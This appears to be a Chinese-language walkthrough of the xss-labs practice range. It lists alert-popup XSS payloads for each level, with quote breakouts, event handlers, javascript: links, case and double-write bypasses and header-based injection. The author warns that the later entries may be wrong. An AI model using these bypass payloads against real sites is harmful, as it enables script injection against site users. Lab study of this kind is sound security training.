前言
- 靶场项目地址:https://github.com/do0dl3/xss-labs
题目
level1
-
直接传入弹个窗就行了
level1.php?name=<script>alert('xss')</script>
level2
-
需写闭合前面的
<input name=keyword value="
level2.php?keyword="><script>alert('xss')</script>
level3
-
和level2类似,但是
<>
符号被转义,所以无法像上面一样,所以用onclick
事件属性来触发弹窗,传入后,点击搜索输入框就行level3.php?keyword='onclick='alert("xss")
level4
-
同level3,只不过单引号闭合换双引号
level3.php?keyword="onclick="alert('xss')
level5
-
关键字替换,on被过滤了,所以用
href
替换。level5.php?keyword="><a href='javascript:alert(/xss/)'>
level6
-
关键字替换,
href
也用不了,但是能大小写绕过。传入点击<a>
标签链接就行level6.php?keyword="><a+hRef='javascript:alert(/xss/)'>
level7
-
同理双写绕过。传入点击
<a>
标签链接就行level7.php?keyword="><a hrhRefef='javascrscriptipt:alert(/xss/)'>
level8
-
关键字检查,用HTML实体编码绕过,传入点击友情链接就行。
javascript:alert(/xss/)
level9
-
同上,不过必须包含http://
javascript:alert(/xss/)//http://
level10
-
没有输入框,打开控制台将
name="t_sort"
中的type="hidden"
删除,出来空白输入框输入,然后点击空白框就行。"type='text' onclick="javascript:alert(/xss/)
level11
-
输入来自Referer,用HackBar添加或者Burp抓包修改就行打开,然后再点击空白输入框就行。
"type='text' onclick="javascript:alert(/xss/)
level12
-
同上,输入来自User-Agent
"type='text' onclick="javascript:alert(/xss/)
level13
-
同上,输入来自cookie,还是Burp好用。
user: "type='text' onclick="javascript:alert(/xss/)
level14
- exif xss。
level15
- exif xss。
over
- 后面的多多少少可能有点问题。就这样吧。
- 没有存储型